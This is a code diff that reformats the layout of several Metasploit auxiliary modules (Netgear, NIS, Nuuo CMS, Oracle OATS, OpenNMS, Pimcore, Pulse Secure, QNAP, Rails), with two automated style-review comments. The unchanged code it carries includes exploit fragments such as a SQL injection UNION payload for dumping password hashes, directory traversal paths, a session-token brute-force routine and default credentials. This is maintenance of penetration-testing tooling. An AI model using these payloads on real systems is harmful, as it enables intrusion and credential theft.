[ 'URL', 'https://thehackernews.com/2017/01/Netgear-router-password-hacking.html'],
@@ -32,13 +31,15 @@ class MetasploitModule < Msf::Auxiliary
[ 'URL', 'https://pastebin.com/dB4bTgxz'],
[ 'EDB', '41205']
],
'License' => MSF_LICENSE
))
'License' => MSF_LICENSE
)
)
register_options(
[
OptString::new('TARGETURI', [true, 'The base path to the vulnerable application', '/'])
])
[
OptString::new('TARGETURI', [true, 'The base path to the vulnerable application', '/'])
]
)
end
# @return substring of 'text', usually a response from a server in this case
@@ -78,7 +79,7 @@ class MetasploitModule < Msf::Auxiliary
r = send_request_cgi({
'uri' => "/passwordrecovered.cgi",
'vars_get' => { 'id' => token }
'vars_get' => { 'id' => token }
})
vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")
@@ -108,8 +109,7 @@ class MetasploitModule < Msf::Auxiliary
# Almost every NETGEAR router sends a 'WWW-Authenticate' header in the response
# This checks the response for that header.
def check
res = send_request_cgi({'uri'=>'/'})
res = send_request_cgi({ 'uri' => '/' })
if res.nil?
fail_with(Failure::Unreachable, 'Connection timed out.')
end
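Review bot: In `check`, `if res.nil?` / `fail_with(...)` / `end` is a three-line guard that Ruby convention writes as the modifier form `fail_with(Failure::Unreachable, 'Connection timed out.') if res.nil?`; the rest of `check` continues outside this hunk. In the earlier hunk, `vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")` is printed only after `send_request_cgi` has returned, so the "Sending" message never appears while a request is actually hanging — move it above the call.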
@@ -9,30 +9,33 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'NIS bootparamd Domain Name Disclosure',
'Description' => %q{
This module discloses the NIS domain name from bootparamd.
super(
update_info(
info,
'Name' => 'NIS bootparamd Domain Name Disclosure',
'Description' => %q{
This module discloses the NIS domain name from bootparamd.
You must know a client address from the target's bootparams file.
You must know a client address from the target's bootparams file.
Hint: try hosts within the same network range as the target.
},
'Author' => [
'SATAN', # boot.c
'pentestmonkey', # Blog post
'wvu' # Metasploit module
],
'References' => [
['URL', 'https://datatracker.ietf.org/doc/html/rfc1831'],
['URL', 'https://datatracker.ietf.org/doc/html/rfc4506'],
['URL', 'https://pentestmonkey.net/blog/nis-domain-name']
],
'License' => MSF_LICENSE
))
Hint: try hosts within the same network range as the target.
},
'Author' => [
'SATAN', # boot.c
'pentestmonkey', # Blog post
'wvu' # Metasploit module
],
'References' => [
['URL', 'https://datatracker.ietf.org/doc/html/rfc1831'],
['URL', 'https://datatracker.ietf.org/doc/html/rfc4506'],
['URL', 'https://pentestmonkey.net/blog/nis-domain-name']
],
'License' => MSF_LICENSE
)
)
register_options([
OptEnum.new('PROTOCOL', [true, 'Protocol to use', 'udp', %w[tcp udp]]),
OptEnum.new('PROTOCOL', [true, 'Protocol to use', 'udp', %w[tcp udp]]),
OptAddress.new('CLIENT', [true, "Client from target's bootparams file"])
])
@@ -42,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
end
def run
proto = datastore['PROTOCOL']
proto = datastore['PROTOCOL']
client = datastore['CLIENT']
begin
@@ -106,11 +109,11 @@ class MetasploitModule < Msf::Auxiliary
print_good(msg)
report_note(
host: rhost,
port: rport,
host: rhost,
port: rport,
proto: proto,
type: 'nis.bootparamd.domain',
data: { :message => msg }
type: 'nis.bootparamd.domain',
data: { :message => msg }
)
end
end
+35 -32
@@ -9,36 +9,39 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'NIS ypserv Map Dumper',
'Description' => %q{
This module dumps the specified map from NIS ypserv.
super(
update_info(
info,
'Name' => 'NIS ypserv Map Dumper',
'Description' => %q{
This module dumps the specified map from NIS ypserv.
The following examples are from ypcat -x:
The following examples are from ypcat -x:
Use "ethers" for map "ethers.byname"
Use "aliases" for map "mail.aliases"
Use "services" for map "services.byname"
Use "protocols" for map "protocols.bynumber"
Use "hosts" for map "hosts.byname"
Use "networks" for map "networks.byaddr"
Use "group" for map "group.byname"
Use "passwd" for map "passwd.byname"
Use "ethers" for map "ethers.byname"
Use "aliases" for map "mail.aliases"
Use "services" for map "services.byname"
Use "protocols" for map "protocols.bynumber"
Use "hosts" for map "hosts.byname"
Use "networks" for map "networks.byaddr"
Use "group" for map "group.byname"
Use "passwd" for map "passwd.byname"
You may specify a map by one of the nicknames above.
},
'Author' => 'wvu',
'References' => [
['URL', 'https://datatracker.ietf.org/doc/html/rfc1831'],
['URL', 'https://datatracker.ietf.org/doc/html/rfc4506']
],
'License' => MSF_LICENSE
))
You may specify a map by one of the nicknames above.
},
'Author' => 'wvu',
'References' => [
['URL', 'https://datatracker.ietf.org/doc/html/rfc1831'],
['URL', 'https://datatracker.ietf.org/doc/html/rfc4506']
],
'License' => MSF_LICENSE
)
)
register_options([
OptEnum.new('PROTOCOL', [true, 'Protocol to use', 'tcp', %w[tcp udp]]),
OptString.new('DOMAIN', [true, 'NIS domain']),
OptString.new('MAP', [true, 'NIS map to dump', 'passwd'])
OptString.new('MAP', [true, 'NIS map to dump', 'passwd'])
])
register_advanced_options([
@@ -47,8 +50,8 @@ class MetasploitModule < Msf::Auxiliary
end
def run
proto = datastore['PROTOCOL']
domain = datastore['DOMAIN']
proto = datastore['PROTOCOL']
domain = datastore['DOMAIN']
map_name = nick_to_map(datastore['MAP'])
begin
@@ -151,14 +154,14 @@ class MetasploitModule < Msf::Auxiliary
# ypcat -x
def nick_to_map(nick)
{
'ethers' => 'ethers.byname',
'aliases' => 'mail.aliases',
'services' => 'services.byname',
'ethers' => 'ethers.byname',
'aliases' => 'mail.aliases',
'services' => 'services.byname',
'protocols' => 'protocols.bynumber',
'hosts' => 'hosts.byname',
'networks' => 'networks.byaddr',
'group' => 'group.byname',
'passwd' => 'passwd.byname'
'hosts' => 'hosts.byname',
'networks' => 'networks.byaddr',
'group' => 'group.byname',
'passwd' => 'passwd.byname'
}[nick] || nick
end
+27 -26
@@ -11,34 +11,36 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Nuuo Central Management Server User Session Token Bruteforce',
'Description' => %q{
Nuuo Central Management Server below version 2.4 has a flaw where it sends the
heap address of the user object instead of a real session number when a user logs
in. This can be used to reduce the keyspace for the session number from 10 million
to 1.2 million, and with a bit of analysis it can be guessed in less than 500k tries.
This module does exactly that - it uses a computed occurrence table to try the most common
combinations up to 1.2 million to try to guess a valid user session.
This session number can then be used to achieve code execution or download files - see
the other Nuuo CMS auxiliary and exploit modules.
Note that for this to work a user has to be logged into the system.
},
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
super(
update_info(
info,
'Name' => 'Nuuo Central Management Server User Session Token Bruteforce',
'Description' => %q{
Nuuo Central Management Server below version 2.4 has a flaw where it sends the
heap address of the user object instead of a real session number when a user logs
in. This can be used to reduce the keyspace for the session number from 10 million
to 1.2 million, and with a bit of analysis it can be guessed in less than 500k tries.
This module does exactly that - it uses a computed occurrence table to try the most common
combinations up to 1.2 million to try to guess a valid user session.
This session number can then be used to achieve code execution or download files - see
the other Nuuo CMS auxiliary and exploit modules.
Note that for this to work a user has to be logged into the system.
},
'Author' => [
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2018-17888' ],
[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-18-284-02' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt' ]
],
'Platform' => ['win'],
'DisclosureDate' => '2018-10-11'))
'Platform' => ['win'],
'DisclosureDate' => '2018-10-11'
)
)
deregister_options('SESSION', 'USERNAME', 'PASSWORD')
end
@@ -67,15 +69,14 @@ class MetasploitModule < Msf::Auxiliary
['3', '6', '7', 'b', 'e', '9', '2', 'f', '4', '1', 'c', 'a', '0', 'd', '8'],
['0', '8']
def session_number_list(weighted_array)
# Let's calculate all the possible combinations
length = Array.new(weighted_array.length)
for i in (0..weighted_array.length-1)
for i in (0..weighted_array.length - 1)
length[i] = weighted_array[i].length
end
counter = Array.new(weighted_array.length)
for i in (0..weighted_array.length-1)
for i in (0..weighted_array.length - 1)
counter[i] = 0
end
total = 1
@@ -101,8 +102,8 @@ class MetasploitModule < Msf::Auxiliary
# Then we increment the value of the counter so we go on to the next combination.
for index in (counter.length - 1).downto(0) # From (counter array's length - 1) to 0
if counter[index] + 1 < length[index] then # If counter index can be incremented
counter[index] += 1; # Increment the counter index
break; # Stop the incrementation/go to the next combination printing/incrementing.
counter[index] += 1; # Increment the counter index
break; # Stop the incrementation/go to the next combination printing/incrementing.
end
counter[index] = 0; # Assign current counter index to zero and try incrementing the next counter index.
end
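Review bot: `session_number_list` still uses `for i in (0..weighted_array.length - 1)` twice; the autofix only spaced the subtraction, but `for` leaks its loop variable and both loops are one-liners: `length = weighted_array.map(&:length)` and `counter = Array.new(weighted_array.length, 0)`. The second hunk keeps trailing semicolons on `counter[index] += 1;`, `break;` and `counter[index] = 0;`, which RuboCop's Style/Semicolon would normally remove — confirm whether that cop is disabled for this file. The method starts in the first hunk and ends outside the second.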
@@ -9,55 +9,59 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Nuuo Central Management Server Authenticated Arbitrary File Download',
'Description' => %q{
The Nuuo Central Management Server allows an authenticated user to download files from the
installation folder. This functionality can be abused to obtain administrative credentials,
the SQL Server database password and arbitrary files off the system with directory traversal.
The module will attempt to download CMServer.cfg (the user configuration file with all the user
passwords including the admin one), ServerConfig.cfg (the server configuration file with the
SQL Server password) and a third file if the FILE argument is provided by the user.
The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules
included in Metasploit, these files cannot be decrypted programmatically. The user will
have to open them with zip or a similar program and provide the default password "NUCMS2007!".
This module will either use a provided session number (which can be guessed with an auxiliary
module) or attempt to login using a provided username and password - it will also try the
default credentials if nothing is provided.
All versions of CMS server up to and including 3.5 are vulnerable to this attack.
},
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
super(
update_info(
info,
'Name' => 'Nuuo Central Management Server Authenticated Arbitrary File Download',
'Description' => %q{
The Nuuo Central Management Server allows an authenticated user to download files from the
installation folder. This functionality can be abused to obtain administrative credentials,
the SQL Server database password and arbitrary files off the system with directory traversal.
The module will attempt to download CMServer.cfg (the user configuration file with all the user
passwords including the admin one), ServerConfig.cfg (the server configuration file with the
SQL Server password) and a third file if the FILE argument is provided by the user.
The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules
included in Metasploit, these files cannot be decrypted programmatically. The user will
have to open them with zip or a similar program and provide the default password "NUCMS2007!".
This module will either use a provided session number (which can be guessed with an auxiliary
module) or attempt to login using a provided username and password - it will also try the
default credentials if nothing is provided.
All versions of CMS server up to and including 3.5 are vulnerable to this attack.
},
'Author' => [
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2018-17934' ],
[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-18-284-02' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt' ]
],
'Platform' => ['win'],
'Privileged' => true,
'DisclosureDate' => '2018-10-11'))
'Platform' => ['win'],
'Privileged' => true,
'DisclosureDate' => '2018-10-11'
)
)
register_options(
[
OptInt.new('DEPTH', [true, 'Directory traversal depth [..\]', 2]),
OptString.new('FILE', [false, 'Additional file to download'])
])
]
)
end
def download_file(file_name, ctype='application/zip', depth=2)
def download_file(file_name, ctype = 'application/zip', depth = 2)
res = ncs_send_request({
'method' => 'GETCONFIG',
'user_session' => user_session,
'file_name' => %{#{"..\\"*depth}#{file_name}}
'method' => 'GETCONFIG',
'user_session' => user_session,
'file_name' => %{#{"..\\" * depth}#{file_name}}
})
return nil unless res
path = store_loot(file_name, ctype, datastore['RHOST'],
res.body, file_name, "Nuuo CMS #{file_name} downloaded")
print_good("Downloaded file to #{path}")
@@ -9,38 +9,38 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle Application Testing Suite Post-Auth DownloadServlet Directory Traversal',
'Description' => %q{
This module exploits a vulnerability in Oracle Application Testing Suite (OATS). In the Load
Testing interface, a remote user can abuse the custom report template selector, and cause the
DownloadServlet class to read any file on the server as SYSTEM. Since the Oracle application
contains multiple configuration files that include encrypted credentials, and that there are
public resources for decryption, it is actually possible to gain remote code execution
by leveraging this directory traversal attack.
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Oracle Application Testing Suite Post-Auth DownloadServlet Directory Traversal',
'Description' => %q{
This module exploits a vulnerability in Oracle Application Testing Suite (OATS). In the Load
Testing interface, a remote user can abuse the custom report template selector, and cause the
DownloadServlet class to read any file on the server as SYSTEM. Since the Oracle application
contains multiple configuration files that include encrypted credentials, and that there are
public resources for decryption, it is actually possible to gain remote code execution
by leveraging this directory traversal attack.
Please note that authentication is required. By default, OATS has two built-in accounts:
default and administrator. You could try to target those first.
},
'License' => MSF_LICENSE,
'Author' =>
[
Please note that authentication is required. By default, OATS has two built-in accounts:
default and administrator. You could try to target those first.
},
'License' => MSF_LICENSE,
'Author' => [
'Steven Seeley', # Original discovery
'sinn3r' # Metasploit module
'sinn3r' # Metasploit module
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'RPORT' => 8088
},
'References' =>
[
'References' => [
['CVE', '2019-2557'],
['URL', 'https://srcincite.io/advisories/src-2019-0033/'],
['URL', 'https://www.oracle.com/security-alerts/cpuapr2019.html']
],
'DisclosureDate' => '2019-04-16'
))
'DisclosureDate' => '2019-04-16'
)
)
register_options(
[
@@ -48,7 +48,8 @@ class MetasploitModule < Msf::Auxiliary
OptInt.new('DEPTH', [true, 'The max traversal depth', 1]),
OptString.new('OATSUSERNAME', [true, 'The username to use for Oracle', 'default']),
OptString.new('OATSPASSWORD', [true, 'The password to use for Oracle']),
])
]
)
end
class OracleAuthSpec
@@ -75,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'olt/')
'uri' => normalize_uri(target_uri.path, 'olt/')
})
if res && res.body.include?('AdfLoopbackUtils.runLoopback')
@@ -116,7 +117,7 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.path, 'olt', 'faces', 'login')
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'uri' => uri,
})
fail_with(Failure::Unknown, 'No response from server') unless res
@@ -131,7 +132,7 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.path, 'olt', 'faces', 'login')
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'uri' => uri,
'cookie' => "JSESSIONID=#{auth_spec.session_id}",
'vars_get' =>
{
@@ -156,7 +157,7 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.path, 'olt', 'faces', 'login')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'uri' => uri,
'cookie' => "JSESSIONID=#{auth_spec.session_id}",
'headers' =>
{
@@ -189,7 +190,7 @@ class MetasploitModule < Msf::Auxiliary
dots = '..\\' * datastore['DEPTH']
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'uri' => uri,
'cookie' => "JSESSIONID=#{auth_spec.session_id}",
'vars_get' =>
{
+27 -27
@@ -9,32 +9,35 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenNMS Authenticated XXE',
'Description' => %q{
OpenNMS is vulnerable to XML External Entity Injection in the Real-Time Console interface.
Although this attack requires authentication, there are several factors that increase the
severity of this vulnerability.
super(
update_info(
info,
'Name' => 'OpenNMS Authenticated XXE',
'Description' => %q{
OpenNMS is vulnerable to XML External Entity Injection in the Real-Time Console interface.
Although this attack requires authentication, there are several factors that increase the
severity of this vulnerability.
1. OpenNMS runs with root privileges, taken from the OpenNMS FAQ: "The difficulty with the
core of OpenNMS is that these components need to run as root to be able to bind to low-numbered
ports or generate network traffic that requires root"
1. OpenNMS runs with root privileges, taken from the OpenNMS FAQ: "The difficulty with the
core of OpenNMS is that these components need to run as root to be able to bind to low-numbered
ports or generate network traffic that requires root"
2. The user that you must authenticate as is the "rtc" user which has the default password of
"rtc". There is no mention of this user in the installation guides found here:
http://www.opennms.org/wiki/Tutorial_Installation, only mention that you should change the default
admin password of "admin" for security purposes.
},
'License' => MSF_LICENSE,
'Author' => [
2. The user that you must authenticate as is the "rtc" user which has the default password of
"rtc". There is no mention of this user in the installation guides found here:
http://www.opennms.org/wiki/Tutorial_Installation, only mention that you should change the default
admin password of "admin" for security purposes.
},
'License' => MSF_LICENSE,
'Author' => [
'Stephen Breen <breenmachine[at]gmail.com>', # discovery
'Justin Kennedy <jstnkndy[at]gmail.com>', # metasploit module
],
'References' => [
'References' => [
['CVE', '2015-0975']
],
'DisclosureDate' => '2015-01-08'
))
'DisclosureDate' => '2015-01-08'
)
)
register_options(
[
@@ -44,12 +47,11 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('FILEPATH', [true, "The file or directory to read on the server", "/etc/shadow"]),
OptString.new('USERNAME', [true, "The username to authenticate with", "rtc"]),
OptString.new('PASSWORD', [true, "The password to authenticate with", "rtc"])
])
]
)
end
def run
print_status("Logging in to grab a valid session cookie")
res = send_request_cgi({
@@ -58,7 +60,7 @@ class MetasploitModule < Msf::Auxiliary
'vars_post' => {
'j_username' => datastore['USERNAME'],
'j_password' => datastore['PASSWORD'],
'Login'=> 'Login'
'Login' => 'Login'
},
})
@@ -89,8 +91,8 @@ class MetasploitModule < Msf::Auxiliary
res = send_request_raw({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rtc', 'post/'),
'data' => xxe,
'uri' => normalize_uri(target_uri.path, 'rtc', 'post/'),
'data' => xxe,
'cookie' => cookie
})
@@ -101,7 +103,5 @@ class MetasploitModule < Msf::Auxiliary
else
fail_with(Failure::Unknown, 'Error fetching file, try another')
end
end
end
+38 -34
@@ -7,48 +7,52 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Pimcore Gather Credentials via SQL Injection',
'Description' => %q{
This module extracts the usernames and hashed passwords of all users of
the Pimcore web service by exploiting a SQL injection vulnerability in
Pimcore's REST API.
super(
update_info(
info,
'Name' => 'Pimcore Gather Credentials via SQL Injection',
'Description' => %q{
This module extracts the usernames and hashed passwords of all users of
the Pimcore web service by exploiting a SQL injection vulnerability in
Pimcore's REST API.
Pimcore begins to create password hashes by concatenating a user's
username, the name of the application, and the user's password in the
format USERNAME:pimcore:PASSWORD.
Pimcore begins to create password hashes by concatenating a user's
username, the name of the application, and the user's password in the
format USERNAME:pimcore:PASSWORD.
The resulting string is then used to generate an MD5 hash, and then that
MD5 hash is used to create the final hash, which is generated using
PHP's built-in password_hash function.
},
'Author' => [ 'Thongchai Silpavarangkura', # PoC
'N. Rai-Ngoen', # PoC
'Shelby Pace' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2018-14058' ],
[ 'EDB', '45208' ]
],
'Notes' =>
{
The resulting string is then used to generate an MD5 hash, and then that
MD5 hash is used to create the final hash, which is generated using
PHP's built-in password_hash function.
},
'Author' => [
'Thongchai Silpavarangkura', # PoC
'N. Rai-Ngoen', # PoC
'Shelby Pace' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2018-14058' ],
[ 'EDB', '45208' ]
],
'Notes' => {
'SideEffects' => [ IOC_IN_LOGS ]
},
'DisclosureDate' => '2018-08-13'
))
'DisclosureDate' => '2018-08-13'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, 'The base path to pimcore', '/' ]),
OptString.new('APIKEY', [ true, 'The valid API key for Pimcore REST API', '' ])
])
]
)
end
def available?
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
res && res.code == 200 && res.body.include?('pimcore')
@@ -59,11 +63,11 @@ class MetasploitModule < Msf::Auxiliary
cmd = "#{rand(256)}) UNION ALL SELECT CONCAT(name,\" \",password) from users#"
res = send_request_cgi(
'method' => 'GET',
'uri' => api_uri,
'vars_get' => {
'apikey' => datastore['APIKEY'],
'id' => cmd
'method' => 'GET',
'uri' => api_uri,
'vars_get' => {
'apikey' => datastore['APIKEY'],
'id' => cmd
}
)
@@ -8,56 +8,59 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Pulse Secure VPN Arbitrary File Disclosure',
'Description' => %q{
This module exploits a pre-auth directory traversal in the Pulse Secure
VPN server to dump an arbitrary file. Dumped files are stored in loot.
super(
update_info(
info,
'Name' => 'Pulse Secure VPN Arbitrary File Disclosure',
'Description' => %q{
This module exploits a pre-auth directory traversal in the Pulse Secure
VPN server to dump an arbitrary file. Dumped files are stored in loot.
If the "Automatic" action is set, plaintext and hashed credentials, as
well as session IDs, will be dumped. Valid sessions can be hijacked by
setting the "DSIG" browser cookie to a valid session ID.
If the "Automatic" action is set, plaintext and hashed credentials, as
well as session IDs, will be dumped. Valid sessions can be hijacked by
setting the "DSIG" browser cookie to a valid session ID.
For the "Manual" action, please specify a file to dump via the "FILE"
option. /etc/passwd will be dumped by default. If the "PRINT" option is
set, file contents will be printed to the screen, with any unprintable
characters replaced by a period.
For the "Manual" action, please specify a file to dump via the "FILE"
option. /etc/passwd will be dumped by default. If the "PRINT" option is
set, file contents will be printed to the screen, with any unprintable
characters replaced by a period.
Please see related module exploit/linux/http/pulse_secure_cmd_exec for
a post-auth exploit that can leverage the results from this module.
},
'Author' => [
'Orange Tsai', # Discovery (@orange_8361)
'Meh Chang', # Discovery (@mehqq_)
'Alyssa Herrera', # PoC (@Alyssa_Herrera_)
'Justin Wagner', # Module (@0xDezzy)
'wvu' # Module
],
'References' => [
['CVE', '2019-11510'],
['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'],
['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'],
['URL', 'https://hackerone.com/reports/591295']
],
'DisclosureDate' => '2019-04-24', # Public disclosure
'License' => MSF_LICENSE,
'Actions' => [
['Automatic', 'Description' => 'Dump creds and sessions'],
['Manual', 'Description' => 'Dump an arbitrary file (FILE option)']
],
'DefaultAction' => 'Automatic',
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'HttpClientTimeout' => 5 # This seems sane
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => [],
'RelatedModules' => ['exploit/linux/http/pulse_secure_cmd_exec']
}
))
Please see related module exploit/linux/http/pulse_secure_cmd_exec for
a post-auth exploit that can leverage the results from this module.
},
'Author' => [
'Orange Tsai', # Discovery (@orange_8361)
'Meh Chang', # Discovery (@mehqq_)
'Alyssa Herrera', # PoC (@Alyssa_Herrera_)
'Justin Wagner', # Module (@0xDezzy)
'wvu' # Module
],
'References' => [
['CVE', '2019-11510'],
['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/'],
['URL', 'https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html'],
['URL', 'https://hackerone.com/reports/591295']
],
'DisclosureDate' => '2019-04-24', # Public disclosure
'License' => MSF_LICENSE,
'Actions' => [
['Automatic', 'Description' => 'Dump creds and sessions'],
['Manual', 'Description' => 'Dump an arbitrary file (FILE option)']
],
'DefaultAction' => 'Automatic',
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'HttpClientTimeout' => 5 # This seems sane
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => [],
'RelatedModules' => ['exploit/linux/http/pulse_secure_cmd_exec']
}
)
)
register_options([
OptString.new(
@@ -106,8 +109,8 @@ class MetasploitModule < Msf::Auxiliary
print_status("Dumping #{path}")
res = send_request_cgi(
'method' => 'GET',
'uri' => dir_traversal(path),
'method' => 'GET',
'uri' => dir_traversal(path),
'partial' => true # Allow partial response due to timeout
)
@@ -7,51 +7,54 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'QNAP NAS/NVR Administrator Hash Disclosure',
'Description' => %q{
This module exploits combined heap and stack buffer overflows for QNAP
NAS and NVR devices to dump the admin (root) shadow hash from memory via
an overwrite of __libc_argv[0] in the HTTP-header-bound glibc backtrace.
super(
update_info(
info,
'Name' => 'QNAP NAS/NVR Administrator Hash Disclosure',
'Description' => %q{
This module exploits combined heap and stack buffer overflows for QNAP
NAS and NVR devices to dump the admin (root) shadow hash from memory via
an overwrite of __libc_argv[0] in the HTTP-header-bound glibc backtrace.
A binary search is performed to find the correct offset for the BOFs.
Since the server forks, blind remote exploitation is possible, provided
the heap does not have ASLR.
},
'Author' => [
'bashis', # Vuln/PoC
'wvu', # Module
'Donald Knuth' # Algorithm
],
'References' => [
['URL', 'https://seclists.org/fulldisclosure/2017/Feb/2'],
['URL', 'https://en.wikipedia.org/wiki/Binary_search_algorithm']
],
'DisclosureDate' => '2017-01-31',
'License' => MSF_LICENSE,
'Actions' => [
['Automatic', 'Description' => 'Automatic targeting'],
['x86', 'Description' => 'x86 target', offset: 0x16b2],
['ARM', 'Description' => 'ARM target', offset: 0x1562]
],
'DefaultAction' => 'Automatic',
'DefaultOptions' => {
'SSL' => true
}
))
A binary search is performed to find the correct offset for the BOFs.
Since the server forks, blind remote exploitation is possible, provided
the heap does not have ASLR.
},
'Author' => [
'bashis', # Vuln/PoC
'wvu', # Module
'Donald Knuth' # Algorithm
],
'References' => [
['URL', 'https://seclists.org/fulldisclosure/2017/Feb/2'],
['URL', 'https://en.wikipedia.org/wiki/Binary_search_algorithm']
],
'DisclosureDate' => '2017-01-31',
'License' => MSF_LICENSE,
'Actions' => [
['Automatic', 'Description' => 'Automatic targeting'],
['x86', 'Description' => 'x86 target', offset: 0x16b2],
['ARM', 'Description' => 'ARM target', offset: 0x1562]
],
'DefaultAction' => 'Automatic',
'DefaultOptions' => {
'SSL' => true
}
)
)
register_options([
Opt::RPORT(443),
OptInt.new('OFFSET_START', [true, 'Starting offset (backtrace)', 2000]),
OptInt.new('OFFSET_END', [true, 'Ending offset (no backtrace)', 5000]),
OptInt.new('RETRIES', [true, 'Retry count for the attack', 10])
OptInt.new('OFFSET_END', [true, 'Ending offset (no backtrace)', 5000]),
OptInt.new('RETRIES', [true, 'Retry count for the attack', 10])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/cgi-bin/authLogin.cgi'
'uri' => '/cgi-bin/authLogin.cgi'
)
if res && res.code == 200 && (xml = res.get_xml_document)
@@ -90,12 +93,12 @@ class MetasploitModule < Msf::Auxiliary
if admin_hash
print_good("Hopefully this is your hash: #{admin_hash}")
credential_data = {
workspace_id: myworkspace_id,
workspace_id: myworkspace_id,
module_fullname: self.fullname,
username: 'admin',
private_data: admin_hash,
private_type: :nonreplayable_hash,
jtr_format: 'md5crypt'
username: 'admin',
private_data: admin_hash,
private_type: :nonreplayable_hash,
jtr_format: 'md5crypt'
}.merge(service_details)
create_credential(credential_data)
else
@@ -110,8 +113,8 @@ class MetasploitModule < Msf::Auxiliary
r = datastore['OFFSET_END']
start = Time.now
t = binsearch(l, r)
stop = Time.now
t = binsearch(l, r)
stop = Time.now
time = stop - start
vprint_status("Binary search of #{l}-#{r} completed in #{time}s")
@@ -146,7 +149,7 @@ class MetasploitModule < Msf::Auxiliary
if token && token.start_with?('$1$')
admin_hash = token
addr = "0x#{offset.to_s(16)}"
addr = "0x#{offset.to_s(16)}"
vprint_status("Admin hash found at #{addr} with offset #{t}")
break
end
@@ -185,12 +188,12 @@ class MetasploitModule < Msf::Auxiliary
)
res = send_request_cgi(
'method' => 'GET',
'uri' => '/cgi-bin/cgi.cgi',
#'vhost' => 'Q',
'method' => 'GET',
'uri' => '/cgi-bin/cgi.cgi',
# 'vhost' => 'Q',
'vars_get' => {
'u' => 'admin',
'p' => payload
'u' => 'admin',
'p' => payload
}
)
@@ -10,18 +10,17 @@ class MetasploitModule < Msf::Auxiliary
super(
update_info(
info,
'Name' => "Ruby On Rails File Content Disclosure ('doubletap')",
'Name' => "Ruby On Rails File Content Disclosure ('doubletap')",
'Description' => %q{
This module uses a path traversal vulnerability in Ruby on Rails
versions =< 5.2.2 to read files on a target server.
},
'Author' =>
[
'Author' => [
'Carter Brainerd <0xCB@protonmail.com>', # Metasploit module
'John Hawthorn <john@hawthorn.email>' # PoC/discovery
],
'License' => MSF_LICENSE,
'References' => [
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://hackerone.com/reports/473888' ],
[ 'URL', 'https://github.com/mpgn/Rails-doubletap-RCE' ],
